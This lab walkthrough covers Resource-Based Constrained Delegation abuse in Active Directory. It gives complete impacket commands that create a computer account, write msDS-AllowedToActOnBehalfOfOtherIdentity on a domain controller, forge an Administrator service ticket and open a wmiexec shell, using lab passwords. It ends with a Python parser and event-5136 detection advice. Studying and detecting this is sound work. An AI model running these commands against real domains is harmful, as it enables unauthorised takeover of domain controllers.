Attacking Active Directory
Resource Based Constrained Delegation

  • Resource-Based Constrained Delegation (RBCD)

  • You can abuse RBCD when you can edit the attribute msDS-AllowedToActOnBehalfOfOtherIdentity on the target computer object: any account you list there is allowed to impersonate other users to that machine.

Resource-Based Constrained Delegation

Starting with Windows Server 2012, Microsoft added a finer-grained delegation model called Resource-Based Constrained Delegation. With classic constrained delegation the list of allowed targets (msDS-AllowedToDelegateTo) is set on the front-end service account that delegates, and changing it needs SeEnableDelegationPrivilege, which normally only domain admins hold. With RBCD the configuration lives on the resource instead: the target computer object carries the attribute msDS-AllowedToActOnBehalfOfOtherIdentity, a security descriptor listing the accounts allowed to act on behalf of other identities towards that computer.

This attribute is available on Windows 8.1+ and Windows Server 2012+ (the KDC on a Windows Server 2012 or later domain controller honours it), and domain admin rights are not required to modify it: write permission on the target computer object is enough, which is exactly what makes it abusable.

Exploitation Methodology

RBCD abuse follows directly from the theory above. You need a domain account, the right to write msDS-AllowedToActOnBehalfOfOtherIdentity on the target computer object, and an account with an SPN that you control (a computer account you create yourself is the usual choice). The steps are:

  • Create a computer account you control (here rbcd$). Any domain user can do this while ms-DS-MachineAccountQuota is above 0 (the default is 10).

  • Write the SID of rbcd$ into msDS-AllowedToActOnBehalfOfOtherIdentity on the target computer NYC$ (the domain controller in this lab). This is the step that needs GenericWrite, GenericAll, WriteDacl or ownership on NYC$.

  • Authenticate as rbcd$ (with its password or NT hash) and send an S4U2self request: a service ticket for the user you want to impersonate (Administrator) to rbcd$ itself.

  • Send an S4U2proxy request with that ticket: because NYC$ now trusts rbcd$ to act on behalf of other identities, the KDC issues a service ticket for Administrator to a service on NYC (cifs/nyc.newyork.local).

  • Use that service ticket (pass-the-ticket) to execute commands on NYC as Administrator.

  • The impersonated account must be delegatable: it must not be a member of Protected Users and must not have "Account is sensitive and cannot be delegated" set, otherwise S4U2proxy fails.

  • A typical entry point is GenericAll or GenericWrite on a computer object. In the lab you can see it when you look at the ACLs on users: diego.Montenegro has GenericWrite on NYC.

  • The RBCD exploitation proceeds with the following commands:

  • Create a computer account X (rbcd$)

We are using diego's password, which we changed in the "Generic all on user (CentralPark -> diego.Montenegro)" section:

addcomputer.py -computer-name 'rbcd$' -computer-pass 'rbcdpass' -dc-host nyc.newyork.local 'newyork.local/diego.montenegro:letsdothis'

  • Add the delegation entry on our target: allow X (rbcd$) to act on behalf of other identities to NYC$

rbcd.py -delegate-from 'rbcd$' -delegate-to 'NYC$' -dc-ip 'nyc.newyork.local' -action 'write' newyork.local/diego.montenegro:letsdothis

  • Now that NYC$ lists rbcd$ in msDS-AllowedToActOnBehalfOfOtherIdentity, you can do an S4U2self request followed by an S4U2proxy request as rbcd$. getST.py does both in one go and writes the resulting service ticket to a .ccache file.

  • This results in Administrator access on NYC.

getST.py -spn 'cifs/nyc.newyork.local' -impersonate Administrator -dc-ip 'nyc.newyork.local' 'newyork.local/rbcd$:rbcdpass'

export KRB5CCNAME=/workspace/rbcd/Administrator@cifs_nyc.newyork.local@NEWYORK.LOCAL.ccache
wmiexec.py -k -no-pass @nyc.newyork.local

  • Note that -k needs nyc.newyork.local to resolve to the DC (see the /etc/hosts and Kerberos setup earlier) and that the ticket in the ccache is for cifs/nyc.newyork.local, so target the FQDN, not the IP address.

  • After the exploit, clean up the lab: flush the RBCD entry and delete the computer account. Deleting the account needs more rights than creating it, so we use a domain admin (mateo.Pacheco) for that step:

rbcd.py -delegate-from 'rbcd$' -delegate-to 'nyc$' -dc-ip 'nyc.newyork.local' -action 'flush' newyork.local/diego.Montenegro:letsdothis
addcomputer.py -computer-name 'rbcd$' -computer-pass 'rbcdpass' -dc-host nyc.newyork.local 'newyork.local/mateo.Pacheco:elsenorpacheco' -delete
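The whole attack hinges on one attribute value, so it is worth seeing what rbcd.py actually writes there and how to read it back. The following is an added example, not code from the original page or from impacket: it builds the self-relative security descriptor (MS-DTYP layout) that the write step stores in msDS-AllowedToActOnBehalfOfOtherIdentity, with BUILTIN\Administrators as owner/group and one ACCESS_ALLOWED ACE with mask 0xF01FF per delegating account, the same shape impacket's rbcd.py produces, and then decodes such a blob to list which SIDs may act on behalf of other identities. The domain SID and the RID 1105 used for rbcd$ are constructed for the example; in a real check the blob comes from an LDAP read of the target computer object.

```python
"""
Build and decode msDS-AllowedToActOnBehalfOfOtherIdentity values.

The attribute holds a self-relative NT security descriptor (MS-DTYP 2.4.6).
rbcd.py -action write stores one with BUILTIN\\Administrators as owner/group
and one ACCESS_ALLOWED ACE (mask 0xF01FF) per delegating account; the parser
below reads any such blob back (for example one pulled over LDAP from the
target computer object) and lists which SIDs may delegate to it.
Standard library only, so it runs offline on a constructed sample.
"""
import struct

SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACL_REVISION_DS = 0x04
ACCESS_ALLOWED_ACE_TYPE = 0x00
RBCD_ACE_MASK = 0x000F01FF           # access mask impacket's rbcd.py writes
BUILTIN_ADMINISTRATORS = "S-1-5-32-544"
SD_HEADER = "<BBHIIII"               # Revision, Sbz1, Control, Owner/Group/Sacl/Dacl offsets
ACL_HEADER = "<BBHHH"                # AclRevision, Sbz1, AclSize, AceCount, Sbz2
ACE_HEADER = "<BBHI"                 # AceType, AceFlags, AceSize, Mask (SID follows)


def sid_to_bytes(sid: str) -> bytes:
    """Encode 'S-1-5-21-...-1105' into the binary SID layout."""
    parts = sid.split("-")
    if len(parts) < 3 or parts[0] != "S":
        raise ValueError(f"bad SID: {sid}")
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (struct.pack("<BB", revision, len(subs))
            + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def sid_from_bytes(buf: bytes, off: int) -> str:
    """Decode the binary SID found at offset `off` of `buf`."""
    revision, count = struct.unpack_from("<BB", buf, off)
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from(f"<{count}I", buf, off + 8)
    return f"S-{revision}-{authority}" + "".join(f"-{s}" for s in subs)


def build_rbcd_sd(delegate_sids: list[str]) -> bytes:
    """Self-relative SD allowing each SID to act on behalf of other identities."""
    owner = sid_to_bytes(BUILTIN_ADMINISTRATORS)
    aces = b""
    for sid in delegate_sids:
        sid_b = sid_to_bytes(sid)
        ace_size = struct.calcsize(ACE_HEADER) + len(sid_b)
        aces += struct.pack(ACE_HEADER, ACCESS_ALLOWED_ACE_TYPE, 0, ace_size, RBCD_ACE_MASK) + sid_b
    acl_size = struct.calcsize(ACL_HEADER) + len(aces)
    acl = struct.pack(ACL_HEADER, ACL_REVISION_DS, 0, acl_size, len(delegate_sids), 0) + aces
    off_owner = struct.calcsize(SD_HEADER)
    off_group = off_owner + len(owner)
    off_dacl = off_group + len(owner)          # layout: header, owner, group, DACL (no SACL)
    header = struct.pack(SD_HEADER, 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT,
                         off_owner, off_group, 0, off_dacl)
    return header + owner + owner + acl


def allowed_to_act(blob: bytes) -> list[tuple[str, int]]:
    """Return (SID, mask) for every ACCESS_ALLOWED ACE in the blob's DACL."""
    revision, _, control, _, _, _, off_dacl = struct.unpack_from(SD_HEADER, blob, 0)
    if revision != 1:
        raise ValueError("unsupported security descriptor revision")
    # No DACL present: nobody is trusted to delegate to this resource.
    if not control & SE_DACL_PRESENT or off_dacl == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from(ACL_HEADER, blob, off_dacl)
    off = off_dacl + struct.calcsize(ACL_HEADER)
    allowed = []
    for _ in range(ace_count):
        ace_type, _, ace_size, mask = struct.unpack_from(ACE_HEADER, blob, off)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            allowed.append((sid_from_bytes(blob, off + struct.calcsize(ACE_HEADER)), mask))
        off += ace_size                        # skip ACE types we do not interpret (deny, object ACEs)
    return allowed


if __name__ == "__main__":
    # Constructed sample: the domain SID and the RID 1105 for rbcd$ are invented for this example.
    rbcd_sid = "S-1-5-21-1004336348-1177238915-682003330-1105"
    blob = build_rbcd_sd([rbcd_sid])
    for sid, mask in allowed_to_act(blob):
        print(f"{sid} may act on behalf of other identities (mask 0x{mask:X})")
```

In practice you resolve each returned SID to a sAMAccountName over LDAP; if the value lists an account the machine owner does not recognise, that is the RBCD backdoor. The same decoding applies to the attribute value carried in a Directory Service Changes event (5136) for msDS-AllowedToActOnBehalfOfOtherIdentity, which is where a defender would catch the write step.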

Last updated 2 years ago
